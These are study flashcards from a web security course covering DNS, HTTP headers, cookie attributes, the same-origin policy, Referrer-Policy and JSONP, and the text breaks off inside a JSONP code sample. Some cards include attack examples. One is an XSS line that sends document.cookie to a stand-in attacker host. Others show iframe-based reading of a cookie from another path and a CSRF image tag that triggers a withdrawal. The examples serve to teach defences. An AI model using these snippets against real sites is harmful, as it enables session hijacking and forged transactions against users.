CS 253 Web Security Youtube Pt1 Flashcards
What is the difference between a vulnerability and an exploit?
A vulnerability is a weakness or flaw in a system that could be abused to make it behave in unintended ways. An exploit is the code or technique that actually takes advantage of a vulnerability to carry out an attack.
What reasons are there to attack a computer system?
Spam - To trick people into clicking things
Denial of service - To attack competitors or seek ransom
Infect visiting users with malware - infect one server, use it to infect hundreds of thousands of clients
Data theft - credentials, credit card numbers, intellectual property
Mine cryptocurrency
Ransomware
Political motivations
What does web security involve?
Browser security, server app security, client app security
It also involves actions to protect the user from:
- Social engineering
- Trackers (private data being leaked)
Why is web security hard?
- The web wants to provide the ability to run anyone’s code on your computer securely. Run untrusted code securely.
- Different sites may interact with each other
- Websites have a lot of low-level features (hardware access)
- There is a desire for high performance
- APIs for web browsers were not designed from first principles. They have evolved.
- Web has strict backwards compatibility requirements. There can be no changes that break previous versions because they could break websites.
What can websites do that constitutes a very high security risk?
- Download content from anywhere
- Spawn worker processes
- Open sockets to a server, or even to another user’s browser
- Display media in a huge number of formats
- Run custom code on the GPU
- Save/read data from the filesystem
What does DNS stand for?
Domain Name System
What is the Domain Name System?
A system that translates user friendly domain names into IP addresses
How does DNS querying work?
The client machine sends the domain name to the DNS server and the server responds with the corresponding IP address.
How does the DNS server work when performing a DNS query?
The client machine sends the domain name to its DNS server, which acts as a DNS Recursive Resolver.
The resolver looks up the answer by querying a chain of other servers. Each one either answers or refers the resolver to the next server to ask, until the resolver gets the IP address.
The queried servers are called nameservers. There are many of them because no single server can hold the records for every existing domain name.
What is a good example of a DNS querying process?
Let’s say we try to access the URL: https://www.stanford.edu
The client sends the domain name (www.stanford.edu) to the DNS Server.
The DNS Server, acting as the DNS Recursive Resolver, queries the Root Nameserver. The Root Nameserver does not have the IP address, so it responds with the instruction to query the “.edu” Nameserver.
The DNS Recursive Resolver queries the “.edu” Nameserver. The “.edu” Nameserver does not have the IP address, so it responds with the instruction to query the “stanford.edu” Nameserver.
The DNS Recursive Resolver queries the “stanford.edu” Nameserver. The “stanford.edu” Nameserver does have the IP address, so it returns it.
The DNS Recursive Resolver returns the received IP address to the Client.
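The referral chain in this example can be sketched as a small simulation. Everything here is hypothetical: the nameserver table, the server names and the IP address (taken from a range reserved for documentation) are made up, and no real DNS traffic is sent.

```javascript
// Hypothetical in-memory "nameservers". Each one maps a name either to a
// referral (the next nameserver to ask) or to a final IP address.
const NAMESERVERS = {
  "root": { "edu": { referTo: "edu-tld" } },
  "edu-tld": { "stanford.edu": { referTo: "stanford-ns" } },
  // 192.0.2.10 is a documentation-only address, not Stanford's real IP.
  "stanford-ns": { "www.stanford.edu": { ip: "192.0.2.10" } },
};

// Ask one nameserver about a hostname: return the record for the longest
// suffix of the hostname that this server knows, or null if it knows none.
function lookup(serverName, hostname) {
  const records = NAMESERVERS[serverName];
  const labels = hostname.split(".");
  for (let i = 0; i < labels.length; i++) {
    const suffix = labels.slice(i).join(".");
    if (records[suffix]) return records[suffix];
  }
  return null;
}

// The recursive resolver: start at the root and follow referrals until a
// nameserver answers with an IP address (or nobody knows the name).
function resolve(hostname) {
  let server = "root";
  const path = [];
  while (true) {
    path.push(server);
    const answer = lookup(server, hostname);
    if (!answer) return { ip: null, path };
    if (answer.ip) return { ip: answer.ip, path };
    server = answer.referTo;
  }
}

const result = resolve("www.stanford.edu");
console.log(result.path.join(" -> "), "=>", result.ip);
```

The path that is printed mirrors the card: root nameserver, then the TLD nameserver, then the domain nameserver.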
What is a TLD Nameserver?
It’s the nameserver that holds the instructions or addresses for a top-level domain.
Example:
.com
.org
.edu
What does TLD stand for in “TLD Nameserver”?
Top-Level Domain
What is a top-level domain?
It is the last part of the domain name, after the final dot. It usually indicates the type or category of a website.
Examples:
.com
.org
.edu
What does SLD stand for, regarding domain names?
Second-Level Domain
What is a second-level domain?
It is the part of the domain name immediately before the top-level domain. It usually carries the name of the website.
Examples:
wikipedia.com = wikipedia
brainscape.com = brainscape
What is a Domain Nameserver?
The Nameserver that holds the information regarding a particular domain name
What is DNS hijacking?
The attacker changes the DNS records of the target so that they point to the attacker’s own IP address. After this, all site visitors are directed to the attacker’s web server.
What are the vectors (places) where DNS hijacking can occur?
- Malware changes user’s local DNS settings
- Hacked recursive DNS resolver
- Hacked router
- Hacked DNS nameserver
- Compromised user account at DNS provider
What does ISP stand for?
Internet Service Provider
Why is it easy for ISPs to sell the lists of the DNS you have queried?
Because the queries are sent in plaintext.
What can you do to try and avoid ISPs selling your DNS queries lists?
You can consider switching your DNS setting to use the Cloudflare server or any other provider that at least has a good privacy policy.
What do HTTP Status Codes mean in general?
1xx - Informational, the request was received and is still being processed
2xx - Success
3xx - Redirection
4xx - Client error
5xx - Server error
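As a small illustration, the class of a status code is given by its first digit. The function name statusClass is made up for this sketch.

```javascript
// Map an HTTP status code to its general class, using the first digit.
function statusClass(code) {
  if (!Number.isInteger(code) || code < 100 || code > 599) return "Unknown";
  const classes = {
    1: "Informational",
    2: "Success",
    3: "Redirection",
    4: "Client error",
    5: "Server error",
  };
  return classes[Math.floor(code / 100)];
}

for (const code of [200, 301, 404, 503]) {
  console.log(code, statusClass(code));
}
```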
What are some well-known HTTP Success status codes?
200 - OK - Request succeeded
204 - No Content - Request succeeded but answer is empty
206 - Partial Content - Request for specific byte range succeeded
What are some well-known HTTP Redirection status codes?
301 - Moved Permanently - Resource has a new permanent URL
302 - Found - Resource temporarily resides at a different URL
304 - Not Modified - Resource has not been modified since last cached
What are some well-known HTTP Client error codes?
400 - Bad Request - The request was malformed
401 - Unauthorized - Resource is protected, need to authenticate
403 - Forbidden - Resource is protected, denying access
404 - Not Found - Resource was not found
What are some well-known HTTP Server error codes?
500 - Internal Server Error - Generic Server Error
502 - Bad Gateway - Server is a proxy; backend server is unreachable
503 - Service Unavailable - Server is overloaded or down for maintenance
504 - Gateway Timeout - Server is a proxy, backend server responded too slowly
What can an HTTP Proxy server do or be useful for?
It can:
- Cache content
- Block content (malware, adult content, etc)
- Modify content
- Sit in front of many servers (reverse proxy)
What is a client-side proxy?
It’s a proxy that sits between the client and the web and retrieves resources from the internet on the client’s behalf.
It is often used in corporate networks to control employee internet access, enforce content filters, and improve security.
What is another name for a client-side proxy?
Forward proxy
What is another name for a forward proxy?
A client-side proxy
What are the HTTP headers and what are they good for?
They are essentially a map of key-value pairs.
They let the client and the server pass additional information with an HTTP request or response.
This also allows experimental extensions to be added to HTTP without requiring protocol changes.
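To make the "map of key-value pairs" idea concrete, here is a minimal sketch that parses raw header lines into a Map. The parseHeaders helper, the sample header values and the X-Experimental header are made up for illustration. A real HTTP parser handles more cases.

```javascript
// Parse the header lines of a raw HTTP message into a Map.
// Header names are case-insensitive, so they are lower-cased as keys.
function parseHeaders(rawHeaderBlock) {
  const headers = new Map();
  for (const line of rawHeaderBlock.split("\r\n")) {
    const idx = line.indexOf(":");
    if (idx === -1) continue; // skip blank or malformed lines
    const name = line.slice(0, idx).trim().toLowerCase();
    const value = line.slice(idx + 1).trim();
    // Simplification: repeated headers are joined with ", ".
    headers.set(name, headers.has(name) ? headers.get(name) + ", " + value : value);
  }
  return headers;
}

const raw = [
  "Host: example.com",
  "User-Agent: ExampleBrowser/1.0",
  "Accept: text/html",
  "X-Experimental: on", // an unknown header is just one more key-value pair
].join("\r\n");

const parsed = parseHeaders(raw);
console.log(parsed.get("host"), parsed.get("x-experimental"));
```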
What are 11 of the most useful HTTP request headers?
Host
User-Agent
Referer
Cookie
Range
Cache-Control
If-Modified-Since
Connection
Accept
Accept-Encoding
Accept-Language
What is the Host, HTTP request header used for?
It is meant to contain the domain name of the server
What is the User Agent, HTTP request header used for?
It is meant to contain the name of the browser and operating system.
Technically it contains the name of the User Agent rather than the browser, but the User Agent is normally the browser.
What is the Referer, HTTP request header used for?
It is meant to contain the webpage which led you to this page (The word Referer is misspelled, but that’s how it is written in HTTP)
What is the Cookie, HTTP request header used for?
It sends back the cookie the server gave you earlier. This is what keeps you logged in.
What is the Range, HTTP request header used for?
Specifies a subset of bytes to fetch. This is the same Range concept that is used for HTTP 206 response status code.
What is the Cache-Control, HTTP request header used for?
Helps to specify if you want a cached response or not.
What is the If-Modified-Since, HTTP request header used for?
Lets the client specify a date and time so that the server sends the resource only if it has been modified since then. Otherwise the server can answer 304 Not Modified.
What is the Connection, HTTP request header used for?
Sends instructions that control the TCP socket used for the request, either to keep it open or to close it. (keep-alive, close)
What is the Accept, HTTP request header used for?
You can specify which type of response you will accept
Example: text/html
What is the Accept-Encoding, HTTP request header used for?
You can specify which encoding algorithms you understand.
Example: gzip
What is the Accept-Language, HTTP request header used for?
You can specify which language you expect.
Example: es, en
What are 12 of the most useful HTTP response headers?
Date
Last-Modified
Cache-Control
Expires
Vary
Set-Cookie
Location
Connection
Content-Type
Content-Encoding
Content-Language
Content-Length
What is the Date, HTTP response header used for?
It contains when the response was sent.
What is the Last-Modified, HTTP response header used for?
It contains when the content was last modified.
What is the Cache-Control, HTTP response header used for?
It specifies whether you want the client to cache the response or not
What is the Expires, HTTP response header used for?
Contains a date to point out when the browser should discard the response from cache.
What is the Vary, HTTP response header used for?
Contains a list of request headers that affect the response. The browser stores the values of those headers alongside the cached response and compares them on new requests. If they differ, it does not use the cached version. Otherwise it does.
What is the Set-Cookie, HTTP response header used for?
Sets a cookie value on the client
What is the Location, HTTP response header used for?
Used to redirect the client to another URL. This has to be used alongside a 3xx response.
What is the Connection, HTTP response header used for?
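States whether the server will keep the TCP connection open or close it (keep-alive, close). It is the counterpart of the Connection request header.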
What is the Content-Type, HTTP response header used for?
States the media type of the response body (example: text/html). It is the counterpart of the Accept request header.
What is the Content-Encoding, HTTP response header used for?
States which encoding algorithm was applied to the response body (example: gzip). It is the counterpart of the Accept-Encoding request header.
What is the Content-Language, HTTP response header used for?
States the language of the response body (example: es). It is the counterpart of the Accept-Language request header.
What is the Content-Length, HTTP response header used for?
States the size of the response body in bytes.
What does HTTP stand for?
Hypertext Transfer Protocol
What does TLS stand for?
Transport Layer Security
What does TCP stand for?
Transmission Control Protocol
What does IP stand for?
Internet Protocol
What does the client need to do in order to find the IP of the site it wants to connect to?
It needs to request it through the DNS Server using the domain name
What does the client do after getting the IP address?
It opens a connection using TCP
What does the client do after opening the TCP connection?
It sets up TLS encryption on top of the connection, although this step is optional
What does the client do after opening the TCP connection and applying (or not) the TLS encryption?
It makes the HTTP request by using the socket opened by TCP.
What happens when you type a URL and press enter?
- Perform a DNS lookup on the hostname (example.com) to get an IP address (1.2.3.4)
- Open a TCP socket to 1.2.3.4 on port 80 (the HTTP port)
- Send an HTTP request that includes the desired path
- Read the HTTP response from the socket
- Parse the HTML into the DOM
- Render the page based on the DOM
- Repeat until all external resources are loaded:
  - If there are pending external resources, make HTTP requests for these (run steps 1-4)
  - Render the resources into the page
What is the syntax for a server to set a cookie on a client?
Set-Cookie: theme=dark;
What is the syntax for a client to send a cookie to the server?
Cookie: theme=dark;
What is a session?
The method in which a server keeps a set of data related to a user’s current “browsing session”
What are some examples in which sessions are commonly implemented?
Logins
Shopping carts
User tracking
What does the term “Access Control” refer to?
To the act of regulating who can view resources or take actions on a website.
What does the term “Ambient Authority” refer to?
To implementing Access Control based on a global and persistent property of the requester.
Which types of Ambient Authority exist on the web?
4 in total:
Cookies - the most common and most versatile method
IP checking - used at Stanford for library resources.
Built-in HTTP Authentication - rarely used
Client Certificates - rarely used
What are the signature schemes normally used for implementing Ambient Authority with Cookies?
The triple of algorithms
- Generator
- Signer
- Verifier
What does the Generator function do?
It does not receive any input and returns a public key (pk) and a secret key (sk)
What does the Signer function do?
Receives the secret key and a value.
It uses the secret key to perform a series of operations on the value and returns a value called the tag (the signature of the value).
What does the Verifier function do?
It receives the public key, the original value and the tag.
Internally it performs a series of operations to check that the tag is valid for the original value.
How does the process of requests work using the Ambient Authority with Cookies?
- The server generates the pk and sk
- The browser sends a POST login request
- The server validates the user and password
- The server signs the username value and generates a tag
- Server sends back the tag and the username as cookies with the Set-Cookie header
- The Browser sets both cookies as instructed by the server
- The Browser sends future requests with both username and tag in the Cookie header
- The server validates if the tag and username are valid for one another
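The flow above can be sketched with Node's built-in crypto module. The cards do not name a signature algorithm, so Ed25519 is an assumption made only for this sketch, and the function names generate, sign and verify simply mirror the Generator, Signer and Verifier cards. Here pk is the public key and sk is the secret key.

```javascript
const crypto = require("crypto");

// Generator: takes no input, returns a public key (pk) and a secret key (sk).
// Assumption: Ed25519 is used here only as an example algorithm.
function generate() {
  const { publicKey, privateKey } = crypto.generateKeyPairSync("ed25519");
  return { pk: publicKey, sk: privateKey };
}

// Signer: uses the secret key to produce a tag for a value.
function sign(sk, value) {
  return crypto.sign(null, Buffer.from(value, "utf8"), sk).toString("base64");
}

// Verifier: checks that the tag is valid for the value.
function verify(pk, value, tag) {
  return crypto.verify(null, Buffer.from(value, "utf8"), pk, Buffer.from(tag, "base64"));
}

// Server side: generate keys once, then sign the username after a valid login.
const { pk, sk } = generate();
const username = "alice";
const tag = sign(sk, username);

// These two cookies would be sent with Set-Cookie and come back in Cookie.
const cookies = { username, tag };

// On later requests the server checks that tag and username belong together.
console.log("genuine cookies accepted:", verify(pk, cookies.username, cookies.tag));
console.log("tampered username accepted:", verify(pk, "bob", cookies.tag));
```

A user who edits the username cookie cannot produce a matching tag without the secret key, so the verification fails.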
What are some cookie attributes you can specify?
Expires - Specifies expiration date. If no date, then lasts for a session
Path - Scope the “Cookie” header to a particular request path prefix
Domain - Allows the cookie to be scoped to a domain broader than the domain that returned the Set-Cookie header
What is the format for the Set-Cookie header sent by the server?
Example:
Set-Cookie: theme=dark; Expires=<date>;
How does Session hijacking work?
When sending cookies over unencrypted HTTP anyone can intercept the cookies and use them to hijack the user’s session.
Once the attacker has the cookie, he can send the victim’s cookie as if it were his own and the server will be fooled into thinking he is the owner of the session.
How can you mitigate a Session hijacking attack?
- You can add the Secure cookie attribute to prevent the cookie from being sent over unencrypted HTTP connections.
Set-Cookie: key=value; Secure
- You can use HTTPS across the entire website
Why does using HTTPS mitigate a Session hijacking attack?
Because the data transferred during HTTPS communication is encrypted.
What is a very common form of JS code used in Session hijacking via Cross Site Scripting?
new Image().src = 'https://attacker.com/steal?cookie=' + document.cookie
What does XSS stand for?
Cross Site Scripting
What can you do to protect your cookies from XSS?
You can add the attribute HttpOnly to your Set-Cookie header.
This way the cookies will not be accessible through JavaScript, only through HTTP.
Set-Cookie: key=value; Secure; HttpOnly
Why would one attempt to use the Path attribute for security?
Because the Path attribute allows you to limit the sharing of a cookie to only a specific url path and therefore on paper it wouldn’t allow other unwanted paths to access the cookie.
Why is it not recommended to use the Path attribute for security?
Because the Path attribute does not protect against unauthorized reading of the cookie from a different path on the same origin.
It can be bypassed using an <iframe> tag
What are the steps needed to bypass the Path attribute?
- Go to another page on the same origin and create an iframe element in JavaScript:
const iframe = document.createElement('iframe')
- Assign the URL from which you want the cookies to the iframe src and add the iframe to the page so that it loads:
iframe.src = 'https://web.stanford.edu/class/cs106a'
document.body.appendChild(iframe)
- Access the document object from the page loaded by the iframe
iframe.contentDocument.cookie
With this you already have unauthorized access to said cookie
What is the best-practice recommendation when using the Path cookie attribute?
Never rely on it for security.
Instead you should set it to the broadest value, so that the cookie applies to the whole site: Path=/
Example:
Set-Cookie: key=value; Secure; HttpOnly; Path=/
What is the problem with ambient authority with cookies?
That the website does not check the origin of the request, it only checks for the cookies to be present.
This means that a request carrying the cookies can be triggered from another site, and the real website will accept it.
If the attacker can get the authorized user’s browser to load attacker-controlled markup, the browser makes the request with the correct cookies attached.
Example:
secretRequestString = 'https://bank.example.com/withdraw?from=originAccountEncrypted&to=destinationAccountEncrypted&amount=encryptedAmount'
<img src="https://bank.example.com/withdraw?from=originAccountEncrypted&to=destinationAccountEncrypted&amount=encryptedAmount" />
What does CSRF stand for?
Cross-Site Request Forgery
What does Cross-Site Request Forgery consist of?
It is an attack which forces an end user to execute unwanted actions on a web app in which they’re currently authenticated
What are some use cases for a Cross-Site Request Forgery attack?
To make a normal user change passwords to one the attacker knows, or to transfer funds.
To make an admin user add a new user (normally the attacker) and give him privileges to access other areas.
What is a SameSite Cookie?
It is a cookie attribute that prevents cookies from being sent with requests initiated by other sites.
What are the 3 possible values of the SameSite cookie attribute?
None, Lax and Strict
What does the cookie attribute SameSite=None do?
It always sends cookies, regardless of the origin of the request. This used to be the default behavior. Modern browsers treat cookies without a SameSite attribute as Lax and require the Secure attribute alongside SameSite=None.
What does the cookie attribute SameSite=Lax do?
It withholds cookies on subresource requests originating from other sites, but allows them on top-level navigations
What does the cookie attribute SameSite=Strict do?
Only sends cookies if the request originates from the same site that set the cookie
How do you apply the SameSite cookie attribute in an example?
Set-Cookie: key=value; Secure; HttpOnly; Path=/; SameSite=Strict
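A minimal sketch of how a server could assemble such a header from the attributes covered so far. The buildSetCookie helper and its option names are hypothetical. Real frameworks ship their own cookie helpers.

```javascript
// Build a Set-Cookie header line from a name, a value and a few attributes.
function buildSetCookie(name, value, options = {}) {
  const parts = [`${name}=${encodeURIComponent(value)}`];
  if (options.secure) parts.push("Secure");       // only send over HTTPS
  if (options.httpOnly) parts.push("HttpOnly");   // hide from document.cookie
  if (options.path) parts.push(`Path=${options.path}`);
  if (options.sameSite) parts.push(`SameSite=${options.sameSite}`);
  if (options.expires) parts.push(`Expires=${options.expires.toUTCString()}`);
  return "Set-Cookie: " + parts.join("; ");
}

const header = buildSetCookie("key", "value", {
  secure: true,
  httpOnly: true,
  path: "/",
  sameSite: "Strict",
});
console.log(header);

// Same cookie with an explicit 30-day lifetime.
const thirtyDays = 30 * 24 * 60 * 60 * 1000;
const withExpiry = buildSetCookie("key", "value", {
  secure: true,
  httpOnly: true,
  path: "/",
  sameSite: "Strict",
  expires: new Date(Date.now() + thirtyDays),
});
console.log(withExpiry);
```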
How long should cookies last as a best practice?
30 days ideally, 90 days at most
How do you set the cookie attribute that points the time a cookie should last?
With the Expires cookie attribute
What is the Same Origin Policy?
It’s the policy that says:
Two pages from different origins should not be allowed to interfere with each other.
What is an origin (in the context of a web browser) analogous to in an operating system?
To an OS process
Each process in an OS is separated from one another so they don’t interfere with each other.
What is a web browser analogous to in an operating system?
To an OS kernel
This is the component in charge of processes management.
What is an OS Kernel?
It is the core component of an Operating System that manages the system’s resources and facilitates communication between hardware and software, acting like a bridge between them.
It provides essential services, like memory management, process management and device management. This enables applications to run and interact with the hardware effectively.
What is an origin, in the context of a web browser, composed of?
It is made up of the protocol, the host and the port.
How would an example of a url with all of its possible parts look and what would each part be?
https://example.com:4000/a/b.html?user=Alice&year=2029#p2
Protocol = https:
Hostname = example.com
Port = 4000
Path = /a/b.html
Query = user=Alice&year=2029
Fragment = p2
What would the function for the same origin policy look like?
function isSameOrigin(url1, url2) {
  return url1.protocol === url2.protocol &&
    url1.hostname === url2.hostname &&
    url1.port === url2.port
}
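A quick way to try this function is with the standard URL class, which exposes protocol, hostname and port. The function is repeated so that the snippet runs on its own, and the URLs compared are made-up examples.

```javascript
function isSameOrigin(url1, url2) {
  return url1.protocol === url2.protocol &&
    url1.hostname === url2.hostname &&
    url1.port === url2.port;
}

const page = new URL("https://example.com:4000/a/b.html?user=Alice&year=2029#p2");

const checks = {
  // Path, query and fragment are not part of the origin.
  differentPath: isSameOrigin(page, new URL("https://example.com:4000/other")),
  differentPort: isSameOrigin(page, new URL("https://example.com:5000/a/b.html")),
  differentProtocol: isSameOrigin(page, new URL("http://example.com:4000/a/b.html")),
  differentHost: isSameOrigin(page, new URL("https://api.example.com:4000/a/b.html")),
  // The URL class reports a default port as an empty string, so these match.
  defaultPort: isSameOrigin(new URL("https://example.com"), new URL("https://example.com:443")),
};
console.log(checks);
```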
What happens when you try to fetch another site, like gmail, from a different site, like localhost, steam, microsoft, etc?
The browser will return a CORS error. Precisely because of the Same Origin Policy.
How is it that the Same Origin Policy works when making a request from site to site? Do you implement it on your website?
No. The Same Origin Policy is implemented at the browser level. Since it is a basic security policy, all browsers enforce it by default.
This is why you sometimes don’t get that error when using other tools to make requests, like Postman or cURL.
What does CORS stand for?
Cross Origin Resource Sharing
What exactly is a CORS error?
It is an error that appears when a cross-origin request is made to a URL whose server has not allowed the requesting origin in its CORS configuration.
By default, only requests that satisfy the Same Origin Policy are allowed.
How is the Fragment section of a Url indicated?
With the # symbol
Example:
https://example.com:4000/a/b.html?user=Alice&year=2029#p2
Fragment = p2
What does a URL with a fragment do?
Navigating to it does not reload the page. The browser jumps to the corresponding section of the page instead.
What is the postMessage API?
It is an API that allows secure cross-origin communication between cooperating origins. It can send strings and arbitrarily complicated data.
What is a best practice (that is actually a must-use practice) of the postMessage API and why?
When using the postMessage API you should specify the origin your data is destined for when calling the postMessage function on the target window (the window or iframe you are sending to), like this:
targetWindow.postMessage(data, 'https://yourtargetsite.com')
This is because the browser will then deliver the message only if the target window is at the specified origin.
Additionally, on the destination site you should always validate the origin of the sender as well.
window.addEventListener('message', event => {
  if (event.origin !== 'http://localhost:4000') {
    return
  }
  div.textContent = event.data
})
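The receiving-side check can be pulled into a small function so that it can be tried outside a browser. This is only a sketch: handleMessage and TRUSTED_SENDERS are hypothetical names, and the events below are plain objects that imitate the origin and data fields of a real message event.

```javascript
// Origins that are allowed to send messages to this page (assumed list).
const TRUSTED_SENDERS = new Set(["http://localhost:4000"]);

// Returns true and renders the data only when the sender is trusted.
function handleMessage(event, render) {
  if (!TRUSTED_SENDERS.has(event.origin)) {
    return false; // ignore messages from unknown origins
  }
  render(String(event.data));
  return true;
}

// In a browser this would be wired up roughly as:
//   window.addEventListener('message', event =>
//     handleMessage(event, text => { div.textContent = text }))

// Simulated events for a quick check.
const shown = [];
handleMessage({ origin: "http://localhost:4000", data: "hello" }, (t) => shown.push(t));
handleMessage({ origin: "https://evil.example", data: "ignored" }, (t) => shown.push(t));
console.log(shown);
```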
What are the url requests exceptions to the Same Origin Policy?
Any embedded static resources are exceptions and can come from another origin. These include:
- Images
- Scripts (like the ones imported in an HTML, like libraries)
- Styles (like Google Fonts)
What is a possible breach that could occur by taking advantage of the exceptions to the Same Origin Policy? What could be the solution?
A site could embed a logged-in user’s avatar image from another origin and use it to make a phishing page look legitimate.
However this could be blocked in 2 ways:
- SameSite Cookies Implementation: the cookies are then not sent with requests initiated by other sites, so the cross-site request arrives without the cookie needed to return the right avatar image.
- Referer Header Validation: Inspect the Referer header, which identifies the page that made the request, and validate it against a list of accepted origins. Additionally you need to add the header Cache-Control: no-store. This forces browsers to never store the resource in cache, so they always make the request to the URL.
If you don’t add the Cache-Control header, the browser may already have the image cached and will use the cached copy without making a request that could be checked. Also, some sites opt out of sending the Referer header at all.
So SameSite cookies are the way to go.
Do Cookies follow the Same Origin Policy? Why?
No
Because they were created before the Same Origin Policy.
Why is it said that Cookies are both more specific and less specific than the Same Origin Policy?
They are more specific because the Path attribute (which limits the paths the cookie is sent to) is narrower than an origin, which only contains protocol, hostname and port.
They are less specific because they allow different origins to set cookies for each other. Example: attacker.stanford.edu could set cookies for stanford.edu
What does the Same Origin Policy allow between two sites that have different origins?
It allows site A to link to site B. You can try to prevent it but it can be circumvented.
It allows site A to embed site B. This can be configured to be prevented.
It allows site A to submit a form to site B. There is a middle ground: with SameSite cookies, cookies are only attached when the form is submitted from the same site.
It allows site A to embed images from site B. You can try to prevent it but it can be circumvented.
It allows site A to embed scripts from site B. You can try to prevent it but it can be circumvented.
What does the Same Origin Policy not allow between two sites that have different origins?
It does not allow site A to embed site B and modify its contents.
It does not allow site A to read data from site B
Can we prevent a site from linking to your site?
No, this is not possible. The web is made so any site can link to another.
However, we can look at the Referer header and reject certain requests. (The Referer header contains information on where the link came from)
How can a site control whether it uses the Referer header or not?
By defining its behaviour through another header called Referrer-Policy
What are the values the Referrer-Policy header can take and what does each one of them do?
Referrer-Policy: unsafe-url
- Sends the full url
Referrer-Policy: no-referrer
- Never sends the Referer header
Referrer-Policy: no-referrer-when-downgrade
- Sends full url. When HTTPS -> HTTP downgrade, then it sends nothing
Referrer-Policy: origin
- Sends origin instead of full url
Referrer-Policy: origin-when-cross-origin
- On same origin, sends full url. On cross origin, sends origin.
Referrer-Policy: same-origin
- On same origin, sends full url. On Cross origin, sends nothing.
Referrer-Policy: strict-origin
- Sends origin. When HTTPS -> HTTP downgrade, sends nothing.
Referrer-Policy: strict-origin-when-cross-origin
- On same origin, sends full URL. On cross origin, sends origin. When HTTPS -> HTTP downgrade, sends nothing.
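The table above can be written as one function that computes what the Referer header would contain for a navigation from one URL to another. This is a simplified sketch, not how browsers implement it: computeReferer is a hypothetical name, a "downgrade" is approximated as going from https: to anything else, and null stands for "no Referer header is sent".

```javascript
// Compute the Referer value for a request from fromUrl to toUrl
// under a given Referrer-Policy. Returns null when nothing is sent.
function computeReferer(policy, fromUrl, toUrl) {
  const from = new URL(fromUrl);
  const to = new URL(toUrl);

  // The fragment and any credentials are never part of the Referer.
  from.hash = "";
  from.username = "";
  from.password = "";

  const full = from.href;
  const originOnly = from.origin + "/";
  const sameOrigin = from.origin === to.origin;
  const downgrade = from.protocol === "https:" && to.protocol !== "https:";

  switch (policy) {
    case "unsafe-url": return full;
    case "no-referrer": return null;
    case "no-referrer-when-downgrade": return downgrade ? null : full;
    case "origin": return originOnly;
    case "origin-when-cross-origin": return sameOrigin ? full : originOnly;
    case "same-origin": return sameOrigin ? full : null;
    case "strict-origin": return downgrade ? null : originOnly;
    case "strict-origin-when-cross-origin":
      if (sameOrigin) return full;
      return downgrade ? null : originOnly;
    default: throw new Error("Unknown policy: " + policy);
  }
}

const from = "https://example.com/a/b.html?user=Alice#p2";
console.log(computeReferer("strict-origin-when-cross-origin", from, "https://example.com/c"));
console.log(computeReferer("strict-origin-when-cross-origin", from, "https://other.example/"));
console.log(computeReferer("strict-origin-when-cross-origin", from, "http://other.example/"));
```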
What is a Cross-origin?
Any protocol, hostname and port combination that differs from the page’s own origin.
What is the X-Frame-Options HTTP Header for?
It lets a page declare whether it permits itself to be displayed in an iframe or not.
What are the values the X-Frame-Options header can take and what does each one of them do?
X-Frame-Options: (not specified)
Any page can display this page in an iframe. This is the default behavior.
X-Frame-Options: deny
Page cannot be displayed in an iframe
X-Frame-Options: sameorigin
Page can only be displayed in an iframe on the same origin as the page itself.
Can we prevent a site from submitting a form to our site?
Yes, but only partially. We need to implement a couple of things.
- Check the Origin header and accept only values on an allowlist.
- Use the SameSite cookie attribute so cookies are not sent with requests from other sites.
These solutions will not prevent the actual form submission, but the server evaluates the submission and discards it if it does not meet the requirements.
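The Origin header check could look roughly like this on the server. The function name, the allowlist contents and the plain-object headers are assumptions for this sketch. Rejecting requests that carry no Origin header at all is a deliberately strict choice made here, not something the cards prescribe.

```javascript
// Origins that are allowed to submit forms to this server (assumed list).
const ALLOWED_FORM_ORIGINS = new Set(["https://bank.example.com"]);

// headers: an object with lower-cased header names, e.g. { origin: "..." }.
function shouldAcceptFormPost(headers) {
  const origin = headers["origin"];
  if (origin === undefined) {
    return false; // strict choice: no Origin header, no processing
  }
  return ALLOWED_FORM_ORIGINS.has(origin);
}

console.log(shouldAcceptFormPost({ origin: "https://bank.example.com" }));
console.log(shouldAcceptFormPost({ origin: "https://attacker.example" }));
```

The submission itself still reaches the server. The check only decides whether the server acts on it.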
Why would we want to prevent a site from linking to our site? What could benefit us from this?
This could help in theory with SEO (Search Engine Optimization). It is commonly believed that if sketchy or bad-reputation sites link to your webpage, your search ranking can suffer, since it could be concluded that your site is related to those other sites.
Why would we want to prevent a site from submitting a form to our site? What could benefit us from this?
This could help us avoid any CSRF (Cross-Site Request Forgery) attacks
Can we prevent a site from embedding our site?
Yes. With the use of the HTTP header: X-Frame-Options
Why would we want to prevent a site from embedding our site? What could benefit us from this?
This could help prevent clickjacking attacks
Can we prevent a site from embedding images from our site?
Yes we have two ways to address this:
For hotlinking: Check the Referer header and accept only values on an allowlist. (The Referer header is not always present)
For avatar images: Use the SameSite cookie attribute.
Why would we want to prevent a site from embedding images from our site? What could benefit us from this?
We could prevent hotlinking
And also prevent attacks where something like the avatar of a user shows up on other sites.
Why would we want to prevent a site from embedding scripts from our site? What could benefit us from this?
To prevent hotlinking. However, embedding scripts is a common practice, since that is how libraries are used. For example:
<script src="..."></script>
With src pointing to the d3 library, this would load d3 onto your site.
Can we prevent a site from embedding scripts from our site?
Yes. We can check the Referer header and accept only values on an allowlist. (The Referer header is not always present)
Are <script> tags subject to the Same Origin Policy?
No, they aren’t
What is JSONP?
JSONP stands for JSON with Padding
It is used for making a request to a URL using the <script> tag instead of the XMLHttpRequest object (the usual way to make HTTP requests from JavaScript).
It basically tells the server to wrap the JSON object in a call to a callback function, callbackName(...). When the script runs, the result is passed as a parameter to that function.
Why would you want to use JSONP?
To allow information to be read from site to site.
Or another way of saying it is to support cross-origin requests.
Remember that this is not allowed by the Same Origin Policy so using JSONP method is a way to allow information to be read from another site.
What are the downsides of using JSONP?
The site providing the data needs to write additional code to support cross-origin requests.
It needs to be careful because not all JSON strings are valid JavaScript.
Additionally it needs to sanitize the user-provided callback argument to prevent an injection attack.
The site consuming the data has to let the providing site run arbitrary JavaScript on its pages. So if the providing site is breached, the consuming site is left vulnerable.
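On the side that provides the data, the first downsides translate into code like the following sketch. jsonpResponseBody is a hypothetical helper. The callback name is restricted to a plain identifier, and the two line-separator characters that are legal in JSON but were not legal inside JavaScript string literals in older engines are escaped.

```javascript
// Build the body of a JSONP response: callbackName(<json>);
function jsonpResponseBody(callbackName, data) {
  // Sanitize the user-provided callback: only a simple identifier is allowed.
  if (!/^[A-Za-z_$][A-Za-z0-9_$]*$/.test(callbackName)) {
    throw new Error("Invalid callback name");
  }
  // Escape U+2028 and U+2029 so the JSON is also safe as JavaScript source.
  const json = JSON.stringify(data)
    .replace(/\u2028/g, "\\u2028")
    .replace(/\u2029/g, "\\u2029");
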